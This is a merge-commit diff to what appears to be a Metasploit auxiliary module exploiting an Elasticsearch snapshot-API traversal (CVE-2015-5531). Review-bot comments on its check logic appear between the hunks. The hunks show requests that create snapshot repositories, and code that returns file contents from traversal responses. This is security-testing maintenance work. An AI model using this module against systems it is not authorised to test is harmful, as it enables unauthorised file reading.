Merge pull request #21344 from adfoster-r7/fix-elasticsearch-traversal-check-support

Fix elasticsearch traversal check support
adfoster-r7
2026-04-21 15:57:26 +01:00
committed by GitHub
2 changed files with 17 additions and 10 deletions
@@ -17,12 +17,10 @@ module Auxiliary::MultipleTargetHosts
end
def check
return Exploit::CheckCode::Unsupported unless has_check?
nmod = replicant
begin
nmod.check_host(datastore['RHOST'])
rescue NoMethodError
Exploit::CheckCode::Unsupported
end
nmod.check_host(datastore['RHOST'])
end
end
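Review bot: With the `rescue NoMethodError` removed, `has_check?` is the only thing that keeps `check` from raising on a module that lacks `check_host`, and its definition ends above this hunk, so I cannot confirm from here that it tests for `check_host` specifically. If it does, a short comment above the call would stop the rescue from being reintroduced later: `# No rescue: a NoMethodError raised inside check_host is a module bug and must surface rather than be reported as Unsupported.` If it tests something broader, the guard should become `return Exploit::CheckCode::Unsupported unless has_check? && respond_to?(:check_host)`.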
@@ -54,17 +54,21 @@ class MetasploitModule < Msf::Auxiliary
'data' => '{"type":"fs","settings":{"location":"dsr"}}'
)
return Exploit::CheckCode::Unknown('Failed to connect to the target.') unless res1
res2 = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '_snapshot', 'pwnie'),
'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}'
)
return Exploit::CheckCode::Unknown('Failed to connect to the target.') unless res2
if res1.body.include?('true') && res2.body.include?('true')
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Appears('Successfully created snapshot repositories, suggesting the Snapshot API is vulnerable to CVE-2015-5531.')
end
Exploit::CheckCode::Safe
Exploit::CheckCode::Safe('Failed to create snapshot repositories.')
end
def read_file(file)
@@ -82,7 +86,12 @@ class MetasploitModule < Msf::Auxiliary
'uri' => travs
)
if res && res.code == 400
unless res
print_error("No response received from the target.")
return nil
end
if res.code == 400
return res.body
else
print_status("Server returned HTTP response code: #{res.code}")
@@ -95,8 +104,8 @@ class MetasploitModule < Msf::Auxiliary
vprint_status("Checking if it's a vulnerable ElasticSearch")
check_code = check_host(ip)
print_status("#{check_code.message}")
if check_host(ip) != Exploit::CheckCode::Appears
print_status(check_code.message)
unless check_code == Exploit::CheckCode::Appears
return
end
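Review bot: The `unless check_code == Exploit::CheckCode::Appears` gate in this last hunk still rests on check_host's `res1.body.include?('true') && res2.body.include?('true')` test (the hunk at new line 54), which matches that substring anywhere in any response, including an error body or a non-200 reply from an intermediary. The new Appears message says the repositories were successfully created, so the condition should confirm exactly that, for example `res1.code == 200 && res1.get_json_document['acknowledged'] == true` and the same for `res2`. Otherwise a host can be reported as likely vulnerable on a coincidental match, and the scan then proceeds against it. The start of check_host and the first request are outside the visible hunk, so this assumes `res1` is the response to a similar repository-creation call.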